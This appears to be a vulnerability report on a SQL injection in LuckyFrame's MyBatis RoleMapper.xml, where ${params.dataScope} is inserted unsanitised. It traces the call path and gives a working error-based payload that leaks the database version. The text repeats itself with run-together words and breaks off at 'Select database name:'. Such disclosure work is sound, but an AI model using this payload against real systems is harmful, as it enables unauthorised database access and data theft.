src/main/resources/mybatis/system/RoleMapper.xml
There is a ${} in this mapper
<if test="deptId != null and deptId != 0">
AND (u.dept_id = #{deptId} OR u.dept_id IN ( SELECT t.dept_id FROM sys_dept t WHERE FIND_IN_SET (#{deptId},ancestors) ))
</if>
<!-- 数据范围过滤 -->
${params.dataScope}
</select>
Search selectUserList to see where the this select id is used:
Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java
Follow up the selectUserList method to see the specific implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
Use error injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))
Select database name:
src/main/resources/mybatis/system/RoleMapper.xml
There is a ${} in this mapper
Search
selectUserListto see where the thisselect idis used:Query user information:
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java
Follow up the selectUserList method to see the specific implementation:
src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated
Verification:
Splice URL and parameters according to code:
Use error injection to query the database version:
params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))Select database name: